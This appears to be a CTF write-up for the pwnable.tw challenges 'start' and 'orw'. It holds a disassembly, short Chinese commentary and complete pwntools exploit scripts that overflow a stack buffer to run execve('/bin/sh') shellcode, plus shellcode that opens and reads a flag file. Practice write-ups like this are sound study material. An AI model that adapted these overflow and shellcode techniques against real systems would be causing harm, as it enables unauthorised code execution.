Start#

Information#

Category: Pwn

Description#

Don’t know how to start?
Check GEF 101 - Solving pwnable.tw/start by @_hugsy

Write-up#

熟悉又陌生？没错你被骗了。

保护全关，泄漏栈地址打 shellcode 。

_start
_start      ; Segment type: Pure code
_start      ; Segment permissions: Read/Execute
_start      _text segment para public 'CODE' use32
_start      assume cs:_text
_start      ;org 8048060h
_start      assume es:nothing, ss:nothing, ds:LOAD, fs:nothing, gs:nothing
_start
_start
_start
_start      ; int start()
_start      public _start
_start      _start proc near
_start      push    esp
_start+1    push    offset _exit
_start+6    xor     eax, eax
_start+8    xor     ebx, ebx
_start+A    xor     ecx, ecx
_start+C    xor     edx, edx
_start+E    push    3A465443h
_start+13   push    20656874h
_start+18   push    20747261h
_start+1D   push    74732073h
_start+22   push    2774654Ch
_start+27   mov     ecx, esp        ; addr
_start+29   mov     dl, 14h         ; len
_start+2B   mov     bl, 1           ; fd
_start+2D   mov     al, 4
_start+2F   int     80h             ; LINUX - sys_write
_start+31   xor     ebx, ebx
_start+33   mov     dl, 3Ch ; '<'
_start+35   mov     al, 3
_start+37   int     80h             ; LINUX -
_start+39   add     esp, 14h
_start+3C   retn
_start+3C   _start endp ; sp-analysis failed
_start+3C
_exit
_exit
_exit      ; Attributes: noreturn
_exit
_exit      ; void exit(int status)
_exit      _exit proc near
_exit
_exit      status= dword ptr  4
_exit
_exit      pop     esp
_exit+1    xor     eax, eax
_exit+3    inc     eax
_exit+4    int     80h             ; LINUX - sys_exit
_exit+4    _exit endp ; sp-analysis failed
_exit+4
_exit+4    _text ends
_exit+4
_exit+4
_exit+4    end _start

Exploit#

1
#!/usr/bin/env python3
2

3
import argparse
4

5
from pwn import (
6
    ELF,
7
    asm,
8
    context,
9
    flat,
10
    process,
11
    raw_input,
12
    remote,
13
)
14

15
parser = argparse.ArgumentParser()
16
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
17
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
18
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
19
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
20
args = parser.parse_args()
21

22

23
FILE = "./start"
24
HOST, PORT = "chall.pwnable.tw", 10000
25

26
context(log_level="debug", binary=FILE, terminal="kitty")
27

28
elf = context.binary
29
libc = elf.libc
30

31

32
def mangle(pos, ptr, shifted=1):
33
    if shifted:
34
        return pos ^ ptr
35
    return (pos >> 12) ^ ptr
36

37

38
def demangle(pos, ptr, shifted=1):
39
    if shifted:
40
        return mangle(pos, ptr)
41
    return mangle(pos, ptr, 0)
42

43

44
def launch(argv=None, envp=None):
45
    global target, thread
46

47
    if argv is None:
48
        argv = [FILE]
49

50
    if args.local and args.threads is not None:
51
        raise ValueError("Options -L and -T cannot be used together.")
52

53
    if args.local:
54
        if args.gdb and "qemu" in argv[0]:
55
            if "-g" not in argv:
56
                argv.insert(1, str(args.port))
57
                argv.insert(1, "-g")
58
        target = process(argv, env=envp)
59
    elif args.threads:
60
        if args.threads <= 0:
61
            raise ValueError("Thread count must be positive.")
62
        process(FILE)
63

64
        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
65
    else:
66
        target = remote(HOST, PORT, ssl=False)
67

68

69
def main():
70
    launch()
71

72
    target.recvuntil(b"Let's start the CTF:")
73
    raw_input("DEBUG")
74
    payload = flat(
75
        {
76
            0: b"/bin/sh\x00",
77
            0x14: elf.sym["_start"] + 39,
78
        },
79
        filler=b"\x41",
80
    )
81
    target.send(payload)
82

83
    stack = int.from_bytes(target.recv(4), "little")
84
    binsh = stack - 0x1C
85
    target.success(f"stack: {hex(stack)}")
86
    target.success(f"binsh: {hex(binsh)}")
87

88
    payload = flat(
89
        {
90
            0: asm(
91
                f"""
92
                mov ebx, {binsh}
93
                mov eax, 0xb
94
                xor ecx, ecx
95
                xor edx, edx
96
                int 0x80
97
                """
98
            ),
99
            0x14: stack - 0x4,
100
        },
101
        filler=b"\x00",
102
    )
103
    target.send(payload)
104

105
    target.interactive()
106

107

108
if __name__ == "__main__":
109
    main()

orw#

Information#

Category: Pwn

Description#

Read the flag from /home/orw/flag.
Only open read write syscall are allowed to use.

Write-up#

上古时代。你怀念吗？我不……

分享点好东西：https://gist.github.com/CuB3y0nd/09f6e4c3db728b9d2f4714da1cac3ca0

Exploit#

1
#!/usr/bin/env python3
2

3
import argparse
4

5
from pwn import (
6
    ELF,
7
    asm,
8
    context,
9
    process,
10
    raw_input,
11
    remote,
12
)
13

14
parser = argparse.ArgumentParser()
15
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
16
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
17
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
18
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
19
args = parser.parse_args()
20

21

22
FILE = "./orw"
23
HOST, PORT = "chall.pwnable.tw", 10001
24

25
context(log_level="debug", binary=FILE, terminal="kitty")
26

27
elf = context.binary
28
libc = elf.libc
29

30

31
def mangle(pos, ptr, shifted=1):
32
    if shifted:
33
        return pos ^ ptr
34
    return (pos >> 12) ^ ptr
35

36

37
def demangle(pos, ptr, shifted=1):
38
    if shifted:
39
        return mangle(pos, ptr)
40
    return mangle(pos, ptr, 0)
41

42

43
def launch(argv=None, envp=None):
44
    global target, thread
45

46
    if argv is None:
47
        argv = [FILE]
48

49
    if args.local and args.threads is not None:
50
        raise ValueError("Options -L and -T cannot be used together.")
51

52
    if args.local:
53
        if args.gdb and "qemu" in argv[0]:
54
            if "-g" not in argv:
55
                argv.insert(1, str(args.port))
56
                argv.insert(1, "-g")
57
        target = process(argv, env=envp)
58
    elif args.threads:
59
        if args.threads <= 0:
60
            raise ValueError("Thread count must be positive.")
61
        process(FILE)
62

63
        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
64
    else:
65
        target = remote(HOST, PORT, ssl=False)
66

67

68
def main():
69
    launch()
70

71
    payload = asm("""
72
        mov ebx, 0x804a094
73
        mov ecx, 0
74
        mov eax, 0x5
75
        int 0x80
76

77
        mov ebx, eax
78
        mov ecx, esp
79
        mov edx, 0x1337
80
        mov eax, 0x3
81
        int 0x80
82

83
        mov ebx, 0x1
84
        mov ecx, esp
85
        mov edx, 0x1337
86
        mov eax, 0x4
87
        int 0x80
88
    flag:
89
        .ascii "/home/orw/flag\\x00"
90
    """)
91
    raw_input("DEBUG")
92
    target.send(payload)
93

94
    target.interactive()
95

96

97
if __name__ == "__main__":
98
    main()